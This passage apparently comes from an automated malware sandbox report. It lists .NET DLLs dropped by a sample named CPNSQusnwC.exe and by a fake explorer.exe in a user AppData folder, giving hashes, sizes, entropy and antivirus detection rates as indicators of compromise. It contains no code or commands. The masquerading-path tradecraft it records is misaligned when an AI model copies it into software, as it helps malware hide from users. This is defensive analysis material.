                                                      SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
                                                      SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                                                      SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 29%
                                                      Process:C:\Users\user\Desktop\CPNSQusnwC.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):39936
                                                      Entropy (8bit):5.629584586954759
                                                      Encrypted:false
                                                      SSDEEP:768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
                                                      MD5:D478E398EFCD2BD9BDBFEA958F7BEE4F
                                                      SHA1:24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
                                                      SHA-256:32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
                                                      SHA-512:0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 17%
                                                      Process:C:\Users\user\Desktop\CPNSQusnwC.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):34816
                                                      Entropy (8bit):5.636032516496583
                                                      Encrypted:false
                                                      SSDEEP:384:JS7LcTqpkHdmLrBmyOLkOPXVcqTZH0uZLSHtciyBDVGehpx3ZPyp1MoCy07G7:J+CaBoXTZH0mUfoGCzpapaFy07
                                                      MD5:996BD447A16F0A20F238A611484AFE86
                                                      SHA1:CB0F51CE7FEEE1B5F02D3F13E60D67AF448C478D
                                                      SHA-256:0CB182B9F8BD0804FC3BBA016926199C536BD7491BA577E089271DC1A63B07BE
                                                      SHA-512:80924C19FAF3916DB5F71BE5723B6CB7BB7F731DBBA05B8218746F11FB9470F746B7AC581DB398E388377637811319EF8D6841504DC8EA39C510D7CFCD25184C
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 21%
                                                      Process:C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):34304
                                                      Entropy (8bit):5.618776214605176
                                                      Encrypted:false
                                                      SSDEEP:768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
                                                      MD5:9B25959D6CD6097C0EF36D2496876249
                                                      SHA1:535B4D0576746D88537D4E9B01353210D893F4D2
                                                      SHA-256:4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
                                                      SHA-512:C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 4%
                                                      Process:C:\Users\user\Desktop\CPNSQusnwC.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):36352
                                                      Entropy (8bit):5.668291349855899
                                                      Encrypted:false
                                                      SSDEEP:384:3+GMbUL+1FjuuGWkgoCFvMiAAsSZH14gXO9XBKeRg3U7ixu8bqMle9dCe4i2+o06:3+T93kgoCFkid/O9sU7io8b1ocl+o
                                                      MD5:94DA5073CCC14DCF4766DF6781485937
                                                      SHA1:57300CA6033974810B71CF1AB4F047A026924A7A
                                                      SHA-256:B81B9FA9B7017BE34F62D30CB16BAAB33757F04CC94EF4D6459C9D3BC768FD18
                                                      SHA-512:7D539ECED2F19166F0F6FAE6E2624C0440DEC87AA9751FA82387EECEF9945997ABAE58C886494633BA360B122BCA955B3DDAE26E5256E371A0528F48DFA17871
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 21%
                                                      Process:C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):39936
                                                      Entropy (8bit):5.629584586954759
                                                      Encrypted:false
                                                      SSDEEP:768:tlPaJVGYXkJSMA2we8qlmau55wC1ND5kwcDl+y5X:chQZwalKdEfDld5
                                                      MD5:D478E398EFCD2BD9BDBFEA958F7BEE4F
                                                      SHA1:24CAA06949CDA52DB45F487EC2A8D3DE9C3FC1FC
                                                      SHA-256:32E821193BE1D81BB3BE97F2719D28A0C7DD2E5BD94DC581D79A1497462EAC9B
                                                      SHA-512:0705A42D2EE234D63DBE0A252A2048D85C817D8DF404EBFC12B583BF24AD84E111621727C7CB2369D1A22538354F725AADE067F0BDC4E2EBE2D61D937C130621
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 17%
                                                      Process:C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):294912
                                                      Entropy (8bit):6.010605469502259
                                                      Encrypted:false
                                                      SSDEEP:6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
                                                      MD5:00574FB20124EAFD40DC945EC86CA59C
                                                      SHA1:8B96C4B6F450E711085AE7B22517C195222ACFDF
                                                      SHA-256:3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
                                                      SHA-512:B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 17%
                                                      Process:C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):38400
                                                      Entropy (8bit):5.699005826018714
                                                      Encrypted:false
                                                      SSDEEP:768:bvTf5JA7rmkHDkK6/X7rpCA0U4oW+YcSNdb/deQoCDKmc:bTffImkjkK6/QAhaceb/dum
                                                      MD5:87765D141228784AE91334BAE25AD743
                                                      SHA1:442BA48B1B5BB158E2E6145B0592F81D20CB9C57
                                                      SHA-256:9A121719F71383CF66FC36453679B36C8D24CC61EB335D0C304536E5D72AAAEB
                                                      SHA-512:77FF7244F4E181A1F2B69A8814E1EFC0B7B55CD551B8D22F5A08039156295F6417D0E2E58265F1C07F8EA2BA3B24D9810B4B3E91B13943688C7450F736746657
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 25%
                                                      Process:C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):50176
                                                      Entropy (8bit):5.723168999026349
                                                      Encrypted:false
                                                      SSDEEP:768:7PCvZsxIexhaqgbv8yGk/A/4NPmAQeMeYzlP58gH8zGTCWxttXyZPM:7P4ZsxIelkY/O+DeuzYbM5xXiE
                                                      MD5:2E116FC64103D0F0CF47890FD571561E
                                                      SHA1:3EF08A9B057D1876C24FC76E937CDA461FAC6071
                                                      SHA-256:25EEEA99DCA05BF7651264FA0C07E0E91D89E0DA401C387284E9BE9AFDF79625
                                                      SHA-512:39D09DE00E738B01B6D8D423BA05C61D08E281482C83835F4C88D2F87E6E0536DDC0101872CBD97C30F977BC223DFAE9FCB3DB71DD8078B7EB5B5A4D0D5207A8
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 17%
                                                      Process:C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):41472
                                                      Entropy (8bit):5.6808219961645605
                                                      Encrypted:false
                                                      SSDEEP:768:IUVSXpIia8xiZ7tRCoz79t6DrMhvUsJAnmboowvDG:IFXRa/Lzugszmboowb
                                                      MD5:6CD78D07F9BD4FECC55CDB392BC5EC89
                                                      SHA1:094DE32070BED60A811D983740509054AD017CE4
                                                      SHA-256:16CC3B734E72A74F578B63D08D81CC75B6C2445FB631EFD19F8A70D786871AD4
                                                      SHA-512:5E25659A66E62F368ACD69790F0CF460008CAA3BB106E45CBA4755896B1872C02438C94E6FB5576891F29B3FEA95D8AAD9BCD7659C179D9619A1CDDB240AEB32
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 17%
                                                      Process:C:\Users\user\Desktop\CPNSQusnwC.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):40448
                                                      Entropy (8bit):5.7028690200758465
                                                      Encrypted:false
                                                      SSDEEP:768:HjeDAXQDM/RgUK+1x85+CnTzP5KJcSdhRGPQPfnay:HjWB2CnTzUJcSdTdP/
                                                      MD5:51B1964F31C557AE8C2B01EA164ABD9F
                                                      SHA1:97C6E8FD1F21D644281FAF82D017969FE22423E4
                                                      SHA-256:AF584F142A9A5A79355B212F8D7A2E3793E33FF23D50FDE591FB2F3E49BF308C
                                                      SHA-512:5D06650D77DD2D574A31664FE9CEAD5E13941F99B2CFA8ECAD972B9E999422816E43A2BE469D9BBDF2778654C22A52656D23B9F230D2F6DF3F2305ABAE779AC3
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 12%
                                                      Process:C:\Users\user\Desktop\CPNSQusnwC.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):33280
                                                      Entropy (8bit):5.634433516692816
                                                      Encrypted:false
                                                      SSDEEP:384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
                                                      MD5:0D323E1CACEA89CAA5DDEAF2F37BCA69
                                                      SHA1:4769C3E947D02A1FD548BE64013F520D571D96E1
                                                      SHA-256:873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
                                                      SHA-512:73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 8%
                                                      Process:C:\Users\user\Desktop\CPNSQusnwC.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):34304
                                                      Entropy (8bit):5.618776214605176
                                                      Encrypted:false
                                                      SSDEEP:768:TBS4lqbgy0+q1nyfBYUyxYIAmghwpgAaaY5:TDY0+q1noBhyufmgCgxa
                                                      MD5:9B25959D6CD6097C0EF36D2496876249
                                                      SHA1:535B4D0576746D88537D4E9B01353210D893F4D2
                                                      SHA-256:4DBA0293B2BA9478EC0738BAD92F0E56CB7CF800B0CA4FDA8261EE2C0C91E217
                                                      SHA-512:C6FA40C2DA5B12683F2785F688984754DF5E11B95170B628F2721A21CD9A6E392672166892B994B8996DC961893A57DAD815C959C6076AB4F91404FEF66141FA
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 4%
                                                      Process:C:\Users\user\Desktop\CPNSQusnwC.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):294912
                                                      Entropy (8bit):6.010605469502259
                                                      Encrypted:false
                                                      SSDEEP:6144:f5M1rY+WGzK4NGSAhWj1dVV6cTl06YX6w/xHtRoNF:fuzzAWlvYXDRoNF
                                                      MD5:00574FB20124EAFD40DC945EC86CA59C
                                                      SHA1:8B96C4B6F450E711085AE7B22517C195222ACFDF
                                                      SHA-256:3A0C38E5DC41A8D668EBDD9368CEE89F4991350E6967A9715CAE8F36E0D032BB
                                                      SHA-512:B578007ECDCEC0D7A3A09F7E5D681A724FE2749CB46B58F5D5C96E88CAAC03C4570BB67F47BC45F01B9A47966086CC08DACB691AA2D26AD0262DC1257F7CA837
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 17%
                                                      Process:C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):46592
                                                      Entropy (8bit):5.870612048031897
                                                      Encrypted:false
                                                      SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                      MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                      SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                      SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                      SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 5%
                                                      Process:C:\Users\user\Desktop\CPNSQusnwC.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):126976
                                                      Entropy (8bit):6.057993947082715
                                                      Encrypted:false
                                                      SSDEEP:3072:V2IJq7YkHFJwBTZtHrC/0/FHkINvdF+nTCkjk1U+1:V2IJq7YbrFHkIrgnTQ
                                                      MD5:16B480082780CC1D8C23FB05468F64E7
                                                      SHA1:6FDDF86F9F0FBAA189F5CB79E44999A3F1AC2B26
                                                      SHA-256:7A080D8BD178EC02C7F39F7F941479074C450C4FDD8E963C993D2FB5537C7708
                                                      SHA-512:A165BB5D7972DE124F670BCAC20B4A46727B7CF27D1ED925D02F7CC7C79D7D04122D7C202C67D7EAE798348E8D481F085282EB5B89D84B902607D7EB1155BA19
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 21%
                                                      Process:C:\Users\user\Desktop\CPNSQusnwC.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):24576
                                                      Entropy (8bit):5.535426842040921
                                                      Encrypted:false
                                                      SSDEEP:384:aShD1nf4AeGAJVdBb9h2d7WNrFBo29TZHD1qPPPPPDPC2C6/Xa3c4J9UbWr4e169:aSPUrJVH94sDBLVZHxqPPPPPDPC2C6/X
                                                      MD5:5420053AF2D273C456FB46C2CDD68F64
                                                      SHA1:EA1808D7A8C401A68097353BB51A85F1225B429C
                                                      SHA-256:A4DFD8B1735598699A410538B8B2ACE6C9A68631D2A26FBF8089D6537DBB30F2
                                                      SHA-512:DD4C7625A1E8222286CE8DD3FC94B7C0A053B1AD3BF28D848C65E846D04A721EA4BFFAFA234A4A96AB218CEE3FC1F5788E996C6A6DD56E5A9AB41158131DFD4B
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 17%
                                                      Process:C:\Users\user\Desktop\CPNSQusnwC.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):22016
                                                      Entropy (8bit):5.41854385721431
                                                      Encrypted:false
                                                      SSDEEP:384:8Np+VQupukpNURNzOLn7TcZ64vTUbqryealcpA2:bPpu0NyzOL0ZJ4bavae
                                                      MD5:BBDE7073BAAC996447F749992D65FFBA
                                                      SHA1:2DA17B715689186ABEE25419A59C280800F7EDDE
                                                      SHA-256:1FAE639DF1C497A54C9F42A8366EDAE3C0A6FEB4EB917ECAD9323EF8D87393E8
                                                      SHA-512:0EBDDE3A13E3D27E4FFDAF162382D463D8F7E7492B7F5C52D3050ECA3E6BD7A58353E8EC49524A9601CDF8AAC18531F77C2CC6F50097D47BE55DB17A387621DF
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 8%
                                                      Process:C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):89600
                                                      Entropy (8bit):5.905167202474779
                                                      Encrypted:false
                                                      SSDEEP:1536:mspaoWV6yRfXRFHJh/fLiSI82VawF1YBJcqe:1paoWMy5XXnfXf2YSYBJcqe
                                                      MD5:06442F43E1001D860C8A19A752F19085
                                                      SHA1:9FBDC199E56BC7371292AA1A25CF4F8A6F49BB6D
                                                      SHA-256:6FB2FAAC08F55BDF18F3FCEE44C383B877F416B97085DBEE4746300723F3304F
                                                      SHA-512:3592162D6D7F0B298C2D277942F9C7E86A29078A4D7B73903183C97DACABC87E0523F0EF992F2BD7350AA8AE9D49910B3CE199BC4103F7DC268BF319293CD577
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 16%
                                                      Process:C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):23552
                                                      Entropy (8bit):5.529329139831718
                                                      Encrypted:false
                                                      SSDEEP:384:ka1bzkw+rsI7GpusgGjLtdPh39rHjN61B7oezUCb2sI:ka5z3IifgGjJdPZ9rDYjtzUmI
                                                      MD5:8AE2B8FA17C9C4D99F76693A627307D9
                                                      SHA1:7BABA62A53143FEF9ED04C5830CDC3D2C3928A99
                                                      SHA-256:0B093D4935BD51AC404C2CD2BB59E2C4525B97A4D925807606B04C2D3338A9BE
                                                      SHA-512:DEFDF8E0F950AA0808AA463363B0091C031B289709837770489E25EC07178D19425648A4109F5EFD0A080697FA3E52F63AABF005A4CCD8235DF61BB9A521D793
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 3%
                                                      Process:C:\Users\user\Desktop\CPNSQusnwC.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):342528
                                                      Entropy (8bit):6.170134230759619
                                                      Encrypted:false
                                                      SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                                      MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                                      SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
                                                      SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                                      SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 50%
                                                      Process:C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):64000
                                                      Entropy (8bit):5.857602289000348
                                                      Encrypted:false
                                                      SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                      MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                      SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                      SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                      SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 25%
                                                      Process:C:\Users\user\Desktop\CPNSQusnwC.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):46592
                                                      Entropy (8bit):5.870612048031897
                                                      Encrypted:false
                                                      SSDEEP:768:kEXtbvrhKJukN9LCewFI4eYWza7q9GYBAfNhgi2keA1RLaew5trbNM:NhKZEq4hWO7cAfN6DdA1R9w5x
                                                      MD5:3601048DFB8C4A69313A593E74E5A2DE
                                                      SHA1:A36A9842EA2D43D7ED024FFB936B4E9AE6E90338
                                                      SHA-256:F5F1BA9E344B2F2E9CF90978C6D3518DFB55B316489E360874E3A1144BAC3C05
                                                      SHA-512:B619A3D2C5CFADDEC234471FF68F96F19CFBBB5491439C3EE3593E0B2B6F995EBDC208563CC1B04FA383A983540646D02681B0CC039595C1845FE8F7941ABB23
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 5%
                                                      Process:C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):22016
                                                      Entropy (8bit):5.41854385721431
                                                      Encrypted:false
                                                      SSDEEP:384:8Np+VQupukpNURNzOLn7TcZ64vTUbqryealcpA2:bPpu0NyzOL0ZJ4bavae
                                                      MD5:BBDE7073BAAC996447F749992D65FFBA
                                                      SHA1:2DA17B715689186ABEE25419A59C280800F7EDDE
                                                      SHA-256:1FAE639DF1C497A54C9F42A8366EDAE3C0A6FEB4EB917ECAD9323EF8D87393E8
                                                      SHA-512:0EBDDE3A13E3D27E4FFDAF162382D463D8F7E7492B7F5C52D3050ECA3E6BD7A58353E8EC49524A9601CDF8AAC18531F77C2CC6F50097D47BE55DB17A387621DF
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 8%
                                                      Process:C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):33280
                                                      Entropy (8bit):5.634433516692816
                                                      Encrypted:false
                                                      SSDEEP:384:TVyNAbQWfDL/QwV/AnmqieB2Ht50uVVxg+94HoxMttjICAQgEYhfAcGQMrygg4Ty:TKWfYwV2u3xg+94HoSbTY4f2gfcab
                                                      MD5:0D323E1CACEA89CAA5DDEAF2F37BCA69
                                                      SHA1:4769C3E947D02A1FD548BE64013F520D571D96E1
                                                      SHA-256:873E7688D95DCAA5468BF94063A94C548EF0D8BE9D4111F1917DA482DBC2A64C
                                                      SHA-512:73F4EDE6D4C62997A4F11AD09A12DFD0BFD749026209E63E52F9D979F9423FDD640E96FA59D51556001C4BE22888E59C67781970649387AF090E26AC40C0C0DE
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 8%
                                                      Process:C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):38912
                                                      Entropy (8bit):5.679286635687991
                                                      Encrypted:false
                                                      SSDEEP:768:RH9nQF3DwRvGTYLOFbL79ed5l8UNebCPncg:TyDF0PybCPn
                                                      MD5:9E910782CA3E88B3F87826609A21A54E
                                                      SHA1:8DBC333244620EDA5D3F1C9EAA6B924455262303
                                                      SHA-256:3B311986251EE5A303671108AFBAF43E0255C4CAE1C26CC9600BB0C7D22D3864
                                                      SHA-512:592981359F46BBC577BE99DEFE3E2A17998BA2882AAAA20107841BCA97C2121CB97C45BC6EDBFC3F430D31450457CD855751727922AB4BB1A3C12DA050EEC057
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 8%
                                                      Process:C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):342528
                                                      Entropy (8bit):6.170134230759619
                                                      Encrypted:false
                                                      SSDEEP:3072:YMRFbwlz0otnh0efcZBU/fbF+pzZDrpSToDxcLQcm+xCjNS3RaCtXAOZrNM1Ge6q:uhj/zQD9SocLQDchaUXAiNM1C3HuiH
                                                      MD5:9DADB5C8A6FD5020275C31EE6BC61D63
                                                      SHA1:ACE09D19F7DBB98F5C844E77F29A5D86E544CCC1
                                                      SHA-256:80E21E05386AB5BF7BCFD745146700E2A73D808CAFDE3F1DAA256D09BCF4522F
                                                      SHA-512:EDB9F8B4A3742AFD344B3E4957CD6A8574FA82EB49B45E75627180C42B51F9C019E241D695BAF0AAA36EE6959CE297C358BC592F2EE31B0BB5EA19FEED67FC7D
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 50%
                                                      Process:C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):32256
                                                      Entropy (8bit):5.631194486392901
                                                      Encrypted:false
                                                      SSDEEP:384:lP/qZmINM9WPs9Q617EsO2m2g7udB2HEsrW+a4yiym4I16Gl:lP/imaPyQ4T5dsHSt9nQ
                                                      MD5:D8BF2A0481C0A17A634D066A711C12E9
                                                      SHA1:7CC01A58831ED109F85B64FE4920278CEDF3E38D
                                                      SHA-256:2B93377EA087225820A9F8E4F331005A0C600D557242366F06E0C1EAE003D669
                                                      SHA-512:7FB4EB786528AD15DF044F16973ECA05F05F035491E9B1C350D6AA30926AAE438E98F37BE1BB80510310A91BC820BA3EDDAF7759D7D599BCDEBA0C9DF6302F60
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 25%
                                                      Process:C:\Users\Default\AppData\Roaming\Microsoft\explorer.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):33792
                                                      Entropy (8bit):5.541771649974822
                                                      Encrypted:false
                                                      SSDEEP:768:VA51bYJhOlZVuS6c4UvEEXLeeG+NOInR:VJEx6f2EEbee/Bn
                                                      MD5:2D6975FD1CC3774916D8FF75C449EE7B
                                                      SHA1:0C3A915F80D20BFF0BB4023D86ACAF80AF30F98D
                                                      SHA-256:75CE6EB6CDDD67D47FB7C5782F45FDC497232F87A883650BA98679F92708A986
                                                      SHA-512:6B9792C609E0A3F729AE2F188DE49E66067E3808E5B412E6DC56A555BC95656DA62ECD07D931B05756303A65383B029E7862C04CA5EA879A3FDFB61789BD2580
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 38%
                                                      Process:C:\Users\user\Desktop\CPNSQusnwC.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):70144
                                                      Entropy (8bit):5.909536568846014
                                                      Encrypted:false
                                                      SSDEEP:1536:3LM14SKtpfLarGzoQWaqaQ2n5YejqSRKnYdYPgh3c//npRwM:w7KtpTjNNn5YejqSRKnYdYPgJo/pRwM
                                                      MD5:E4FA63649F1DBD23DE91861BB39C317D
                                                      SHA1:25F9115FAF40EC6736FACF2288CAA9B0E6AF9366
                                                      SHA-256:CB4CD707305733ADDFCC54A69DF54A0C8D47C312D969B3E8D38B93E18CCBD8E4
                                                      SHA-512:C4B5A9D66146D98D414BC84CD5C09588E2E02B800B21CE3172042AD7F48CC4AED54772D32C891A921FF102C0C3DB1FEAF52E4D4C714ABDB15F73BAEB9A6F5A39
                                                      Malicious:true
                                                      Antivirus:
                                                      • Antivirus: ReversingLabs, Detection: 29%
                                                      Process:C:\Users\user\Desktop\CPNSQusnwC.exe
                                                      File Type:PE32 executable (DLL) (console) Intel 80386 Mono/.Net assembly, for MS Windows
                                                      Category:dropped
                                                      Size (bytes):64000
                                                      Entropy (8bit):5.857602289000348
                                                      Encrypted:false
                                                      SSDEEP:768:TDPfhHfT/9IvAgoeA2U7dtZLr6SWB6/BYklKbz4Xgs7RlkUC4M+JVvTkgny:TD3Jbf2UQoBYHfSRRRC4BvPny
                                                      MD5:5EE7E079F998F80293B3467CE6A5B4AE
                                                      SHA1:3C0932D48F3542E9DFB09AD9E1FF70891A038532
                                                      SHA-256:A3AE7E97703E694C479E3B460F89C16B4A511626E351145532D1A2F3BA051779
                                                      SHA-512:056F03CB02A8A994461A5A26C2D738EE39E5AE49462222AD4937DD1CB9F29C6567D2E368EFB7844E8779B3EB3EB5D87DACDE5E3D24DF8227194DDC2E0556FF8D
                                                      Malicious:true
